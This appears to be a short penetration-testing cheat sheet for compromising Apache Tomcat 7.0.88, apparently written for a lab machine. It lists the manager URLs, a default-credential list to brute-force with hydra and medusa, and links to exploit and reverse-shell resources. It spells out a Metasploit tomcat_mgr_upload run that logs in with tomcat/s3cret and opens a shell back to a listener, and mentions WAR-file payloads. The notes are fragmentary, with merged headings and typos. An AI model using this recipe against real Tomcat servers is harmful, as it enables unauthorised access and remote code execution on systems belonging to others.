Apache Tomcat/7.0.88
- http://$IP:8080/manager/status
- http://$IP:8080/manager/html
- http://$IP:8080/host-manager/html
User | Pass |
---|---|
admin | password |
admin | |
admin | Password1 |
admin | password1 |
admin | admin |
admin | tomcat |
both | tomcat |
manager | manager |
role1 | role1 |
role1 | tomcat |
role | changethis |
root | Password1 |
root | changethis |
root | password |
root | password1 |
root | r00t |
root | root |
root | toor |
tomcat | tomcat |
tomcat | s3cret |
tomcat | password1 |
tomcat | password |
tomcat | |
tomcat | admin |
tomcat | changethis |
Reconnaissance
ping
nmapEnumeration
user.txt
pass.txtmedusa - /manager/status
hydra - /manager/statusmedusa - /manager/html
hydra - /manager/htmlmedusa - /host-manager/html
hydra - /host-manager/htmlExplotation
- https://www.exploit-db.com/exploits/31433
- https://www.rapid7.com/db/modules/exploit/multi/http/tomcat_mgr_upload/
- https://www.revshells.com/
exploit1 - metasploit
use exploit/multi/http/tomcat_mgr_uploa
set RHOST 10.10.10.95
set RPORT 8080
set LHOST 10.10.14.16
set LPORT 4444
set HttpUsername tomcat
set HttpPassword s3cret
options
run
explot 2 - shell.war
payload
listenerexplot 3 - shell.war
payload
listener